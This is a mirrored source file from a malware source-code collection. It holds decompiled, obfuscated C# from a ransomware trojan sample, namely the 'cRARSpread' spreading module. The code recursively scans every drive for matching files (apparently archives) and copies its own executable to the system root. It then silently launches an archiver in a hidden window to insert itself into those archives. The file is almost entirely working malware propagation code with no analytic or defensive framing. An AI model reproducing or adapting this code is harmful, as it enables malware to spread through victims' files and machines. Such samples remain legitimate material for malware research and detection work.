mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
92 lines
4.1 KiB
C#
92 lines
4.1 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
|
// Type: Stub.cRARSpread
|
|||
|
|
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
|
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
|
|||
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
|
|||
|
|
|
|||
|
|
using A;
|
|||
|
|
using System;
|
|||
|
|
using System.Diagnostics;
|
|||
|
|
using System.IO;
|
|||
|
|
using System.Runtime.InteropServices;
|
|||
|
|
using System.Text;
|
|||
|
|
|
|||
|
|
namespace Stub
|
|||
|
|
{
|
|||
|
|
public class cRARSpread
|
|||
|
|
{
|
|||
|
|
private static string ce9ee9bdc267a842d3ef926289d8e02c2;
|
|||
|
|
|
|||
|
|
[DllImport("kernel32.dll", EntryPoint = "GetShortPathName", CharSet = CharSet.Auto)]
|
|||
|
|
private static extern int cf4947a2d3263e417979f2a8d6a63fe5f(
|
|||
|
|
[MarshalAs(UnmanagedType.LPTStr)] string c31bc76e1a9d760d9aeac01c0ca5d54d3,
|
|||
|
|
[MarshalAs(UnmanagedType.LPTStr)] StringBuilder cc505c0b6198cb488994f0dda564f1c32,
|
|||
|
|
int c06afa0370bf8e9e19b50aef2a782433f);
|
|||
|
|
|
|||
|
|
private static void cf93e0385f1c9b9b9fc9168df531885a0(string c23d3141ec47285c032d83ba6aa914036)
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
foreach (string file in Directory.GetFiles(c23d3141ec47285c032d83ba6aa914036))
|
|||
|
|
{
|
|||
|
|
if (file.Contains(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(322)))
|
|||
|
|
cRARSpread.cc62e4c9f9f6eaec701227263483768c8(file);
|
|||
|
|
if (file.Contains(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(331)))
|
|||
|
|
cRARSpread.cc62e4c9f9f6eaec701227263483768c8(file);
|
|||
|
|
}
|
|||
|
|
foreach (string directory in Directory.GetDirectories(c23d3141ec47285c032d83ba6aa914036))
|
|||
|
|
cRARSpread.cf93e0385f1c9b9b9fc9168df531885a0(directory);
|
|||
|
|
}
|
|||
|
|
catch
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public static void RARSpread()
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2 = Process.GetCurrentProcess().MainModule.FileName;
|
|||
|
|
foreach (string logicalDrive in Environment.GetLogicalDrives())
|
|||
|
|
cRARSpread.cf93e0385f1c9b9b9fc9168df531885a0(logicalDrive);
|
|||
|
|
}
|
|||
|
|
catch
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
private static void cc62e4c9f9f6eaec701227263483768c8(string c591e77c72aaa11ae89d3e0a04677b964)
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
|
|||
|
|
string path1 = folderPath.Replace(folderPath.Substring(folderPath.IndexOf(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340))), string.Empty) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340);
|
|||
|
|
string path = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(343);
|
|||
|
|
if (!File.Exists(path))
|
|||
|
|
return;
|
|||
|
|
if (!File.Exists(Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2)))
|
|||
|
|
File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2));
|
|||
|
|
StringBuilder cc505c0b6198cb488994f0dda564f1c32_1 = new StringBuilder((int) byte.MaxValue);
|
|||
|
|
cRARSpread.cf4947a2d3263e417979f2a8d6a63fe5f(Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2), cc505c0b6198cb488994f0dda564f1c32_1, cc505c0b6198cb488994f0dda564f1c32_1.Capacity);
|
|||
|
|
StringBuilder cc505c0b6198cb488994f0dda564f1c32_2 = new StringBuilder((int) byte.MaxValue);
|
|||
|
|
cRARSpread.cf4947a2d3263e417979f2a8d6a63fe5f(c591e77c72aaa11ae89d3e0a04677b964, cc505c0b6198cb488994f0dda564f1c32_2, cc505c0b6198cb488994f0dda564f1c32_2.Capacity);
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
ProcessStartInfo startInfo = new ProcessStartInfo();
|
|||
|
|
string str = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(380) + cc505c0b6198cb488994f0dda564f1c32_2.ToString() + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(387) + cc505c0b6198cb488994f0dda564f1c32_1.ToString();
|
|||
|
|
startInfo.FileName = path;
|
|||
|
|
startInfo.Arguments = str;
|
|||
|
|
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
|
|||
|
|
Process.Start(startInfo);
|
|||
|
|
}
|
|||
|
|
catch
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
catch
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|